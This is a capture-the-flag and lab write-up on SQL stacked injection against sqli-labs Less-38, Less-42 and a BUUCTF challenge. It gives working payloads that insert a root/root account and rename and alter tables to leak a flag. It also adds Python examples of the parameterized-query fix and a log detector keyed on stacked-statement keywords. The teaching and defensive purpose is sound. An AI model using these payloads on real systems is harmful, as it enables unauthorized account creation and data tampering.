I did a web challenge on BUUCTF that involves stacked injection, so let's learn it.
In SQL, a statement ends with `;`. If another SQL statement is appended after the `;`, will both statements be executed together? That is the basis of stacked injection (stacked queries).
The simplest case: `select * from users; DELETE FROM test`
This first queries the `users` table and then deletes every row of the `test` table.
Let's try it hands-on.
Target range: sqli-labs Less-38
First determine the closing character, which is `'`.
Construct the payload: `?id=1' order by 4 %23`
The number of columns is 3.
Less-38 can be treated like a blind injection: whether the second statement succeeded or failed is not echoed back to us.
OK, construct the payload first: `?id=-1'; insert into users(id,username,password) values(88,'aaa','bbb')%23`
The page displays nothing, so check the database.
The last row, username aaa / password bbb, was inserted into the database successfully.
If we add an administrator account and password instead, what happens then?
This level does not make the effect very visible, so let's try Less-42.
sqli-labs Less-42
Since aaa was inserted just now, construct the login payload directly:
① username: `aaa';insert into users(id,username,password) values(60,'root','root')#`
password: `bbb`
I checked the database and found that the insert did not succeed, although the statement was correct. Consider that the username may be filtered or protected in some other way.
② username: `aaa`
password: `bbb';insert into users(id,username,password) values(60,'root','root')#`
Try stacking on the password instead.
Login succeeded.
Check the database.
Inserted successfully.
Look at the source code of Less-42:
```php
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
```
The username is escaped, but the password is taken straight from the POST data and concatenated into the query, which is what allows stacked injection.
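To make the three layers in the Less-42 finding concrete (escaping only one field, sending the string through a multi-statement API, and the parameterized fix), here is an added Python/sqlite3 example. It is not code from this page or from sqli-labs: it assumes sqlite3's `executescript` as a stand-in for PHP's `mysqli_multi_query`, builds a constructed in-memory `users` table, and mirrors the password payload above with `--` in place of `#`, since SQLite has no `#` comment.

```python
import sqlite3

# Constructed sample payload, the same shape as the Less-42 password payload on
# this page: close the string, stack an INSERT, then let a trailing "--" comment
# swallow the application's closing quote. SQLite has no "#" comment.
STACKED_PAYLOAD = ("bbb'; insert into users(id,username,password) "
                   "values(60,'root','root'); select 1 --")


def make_db():
    """Fresh in-memory users table holding the aaa/bbb row that Less-38 inserted."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users(id integer primary key, username text, password text)")
    con.execute("insert into users values (88, 'aaa', 'bbb')")
    con.commit()
    return con


def count_users(con):
    return con.execute("select count(*) from users").fetchone()[0]


def build_query(username, password):
    """The Less-42 string building: username escaped (what mysqli_real_escape_string
    does for quotes), password concatenated raw."""
    safe_user = username.replace("'", "''")   # escaping one field is not enough
    return (f"select count(*) from users where username='{safe_user}' "
            f"and password='{password}'")


def login_multi_statement(con, username, password):
    """Query sent through a multi-statement API (executescript stands in for
    mysqli_multi_query). Every stacked statement runs, and because the app only
    learns that the script ran, the extra INSERT is invisible: the
    'page shows nothing' situation from Less-38."""
    con.executescript(build_query(username, password))
    con.commit()
    return "executed"


def login_single_statement(con, username, password):
    """Same string, but through execute(): the sqlite3 module refuses anything
    after the first statement, so the stacked INSERT never runs. Ordinary
    injection (e.g. ' or '1'='1) still works against this function."""
    try:
        return con.execute(build_query(username, password)).fetchone()[0]
    except (sqlite3.Error, sqlite3.Warning):   # older Pythons raise Warning here
        return "rejected"


def login_parameterized(con, username, password):
    """The actual fix: placeholders keep both inputs as data, so the payload is
    just a password string that matches no row."""
    row = con.execute(
        "select count(*) from users where username=? and password=?",
        (username, password),
    ).fetchone()
    return row[0]


if __name__ == "__main__":
    for fn in (login_multi_statement, login_single_statement, login_parameterized):
        con = make_db()
        result = fn(con, "aaa", STACKED_PAYLOAD)
        print(f"{fn.__name__:24} result={result!r} users_after={count_users(con)}")
```

Running it shows the row count going to 2 only on the multi-statement path; the single-statement API blocks stacking but not ordinary injection, and only the parameterized version is safe against both.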
Another example
[ 2019] Random injection
First check whether there is an injection point: try `1'`
Injection point found.
Then determine the number of columns.
Using `1'union select 1,database();#` produces an error.
Keywords such as select are filtered, so normal injection cannot be used, and error-based injection cannot be used either!
Looking at an expert's writeup, try stacked injection.
First construct the payload: `1';show databases;#`
View the databases.
Then construct the payload `1';show tables;#` to see how many tables there are.
There are only two tables.
From the two tables, query the columns next.
Construct the payload: `0';show columns from words;#`
The flag we want is not there.
Then construct the payload:
0';show columns from `1919810931114514`;#
I forgot to add single quotes around the characters before and tried n times without success! Only after adding them did I realize how terrible my ignorance was; it wasted a lot of time!!!
Found the flag column; the next step is how to get it echoed.
From the picture above we know that the regex filters many keywords, but not alter and rename.
① First rename the `words` table to `words1`
② Rename the `1919810931114514` table to `words`
③ Change the `flag` field to `id`
Construct the payload:
0';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#
This should succeed.
emmmmm, use `1';show tables;#` to check.
Modified successfully.
Access `0'or '1'='1`
Get the flag.
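The challenge above got past a keyword filter because `show`, `rename` and `alter` were never on the blacklist, which is the usual failure mode of keyword filtering. From the defender's side, the same payloads are easy to spot in web server logs by looking for a `;` followed by a statement keyword in a decoded query parameter. The following Python detector is an added example, not part of the original post: the access-log lines are constructed from the payloads on this page, the keyword list is my own assumption, and parameter splitting is done by hand because older versions of `urllib.parse.parse_qsl` also split on `;`. It covers query strings only; a POST body such as the Less-42 password field never reaches an access log.

```python
import re
from urllib.parse import unquote_plus

# Keywords that can open a stacked statement. The challenge above filtered
# "select" but not "show", "rename" or "alter", so a detector keyed only on
# select would have missed every payload in this walkthrough. (Assumed list.)
STATEMENT_KEYWORDS = ("select", "insert", "update", "delete", "drop", "create",
                      "alter", "rename", "show", "set", "prepare", "execute",
                      "handler", "truncate")
STACK_RE = re.compile(r";\s*(" + "|".join(STATEMENT_KEYWORDS) + r")\b", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/')

# Constructed access-log lines (not from the page): the page's payloads,
# percent-encoded as a browser would send them, plus two non-stacked requests.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /Less-38/?id=1%27%20order%20by%204%20%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /Less-38/?id=-1%27;%20insert%20into%20users(id,username,password)%20values(88,%27aaa%27,%27bbb%27)%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2020:10:00:02 +0000] "GET /?inject=1%27;show%20tables;%23 HTTP/1.1" 200 310',
    '10.0.0.5 - - [01/Jan/2020:10:00:03 +0000] "GET /?inject=0%27;RENAME%20TABLE%20%60words%60%20TO%20%60words1%60;ALTER%20TABLE%20%60words%60%20CHANGE%20%60flag%60%20%60id%60%20VARCHAR(100);%23 HTTP/1.1" 200 310',
    '10.0.0.5 - - [01/Jan/2020:10:00:04 +0000] "GET /?inject=0%27or%20%271%27=%271 HTTP/1.1" 200 900',
    '10.0.0.9 - - [01/Jan/2020:10:00:05 +0000] "GET /?id=1&note=a;b HTTP/1.1" 200 120',
]


def decode_param(raw, rounds=3):
    """Percent-decode until stable so a doubly-encoded '%253B' still becomes ';'."""
    value = raw
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def stacked_statements(value):
    """Keywords of statements stacked behind a ';' in one decoded parameter value."""
    return [m.group(1).lower() for m in STACK_RE.finditer(value)]


def query_params(request_target):
    """Split ?a=b&c=d by hand: parse_qsl in older Pythons also splits on ';',
    which would cut apart the very payloads we want to see."""
    _, _, query = request_target.partition("?")
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        yield decode_param(name), decode_param(raw)


def scan_log(lines):
    """Return (line_number, parameter, [keywords]) for every parameter that
    carries a stacked statement; lines without a request line are skipped."""
    hits = []
    for number, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, value in query_params(m.group(1)):
            found = stacked_statements(value)
            if found:
                hits.append((number, name, found))
    return hits


if __name__ == "__main__":
    for number, name, found in scan_log(LOG_LINES):
        print(f"line {number}: parameter {name!r} stacks {', '.join(found)}")
```

On the constructed lines this flags the Less-38 insert, the `show tables` probe and the rename/alter chain, while the plain `' or '1'='1` request and the harmless `a;b` value pass through; the `' or '1'='1` case is a reminder that this check catches stacking specifically, not injection in general, so it belongs alongside the parameterized-query fix rather than in place of it.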